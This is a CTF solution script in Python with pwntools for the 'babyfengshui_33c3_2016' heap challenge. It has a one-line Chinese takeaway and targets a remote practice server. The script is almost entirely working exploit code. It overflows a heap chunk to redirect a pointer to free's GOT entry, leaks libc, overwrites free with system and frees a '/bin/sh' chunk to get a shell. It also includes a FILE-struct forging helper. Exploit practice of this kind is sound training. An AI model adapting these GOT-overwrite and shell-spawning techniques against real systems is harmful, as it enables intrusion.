babyfengshui_33c3_2016

收获：篡改中间name数组的地址来泄露和攻击

from pwn import *
context.log_level = 'debug'
# context.arch = 'amd64'
libc = ELF('./libc-2.23.so')
file = './babyfengshui_33c3_2016'
elf = ELF(file)
shellcode = asm(shellcraft.sh())

local = 0
if local:
    io = process(file)
else:
    io = remote('node4.buuoj.cn',28340)

def debug():
    gdb.attach(io)

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, b"\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b'\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")
    return file_struct

r = lambda : io.recv()
rx = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rud = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
li = lambda name,x : log.info(name+':'+hex(x))
shell = lambda : io.interactive()

def add(description_size,name,text_size,text):
    ru('Action: ')
    sl('0')
    ru('size of description: ')
    sl(str(description_size))
    ru('name: ')
    sl(name)
    ru('text length: ')
    sl(str(text_size))
    ru('text: ')
    sl(text)

def show(idx):
    ru('Action: ')
    sl('2')
    ru('index: ')
    sl(str(idx))

def edit(idx,text_size,text):
    ru('Action: ')
    sl('3')
    ru('index: ')
    sl(str(idx))
    ru('text length: ')
    sl(str(text_size))
    ru('text: ')
    sl(text)

def free(idx):
    ru('Action: ')
    sl('1')
    ru('index: ')
    sl(str(idx))

free_got = elf.got['free']
add(0x80,'aaa',20,'a') #0
add(0x20,'aaa',20,'a') #1
add(0x40,'/bin/sh\x00',20,'/bin/sh\x00') #2
free(0)
pay1 = 0x108*b'a' + p32(0x100) + p32(0x29) + p32(0)*9 + p32(0x89) + p32(free_got)
add(0x108,'aaa',len(pay1),pay1) #3
show(1)
free_addr = u32(ru('\xf7')[-4:])
li('free_addr',free_addr)
libcbase = free_addr - libc.sym['free']
li('libcbase',libcbase)
system = libcbase + libc.sym['system']
li('system',system)
edit(1,len(p32(system)),p32(system))
free(2)
shell()
#debug()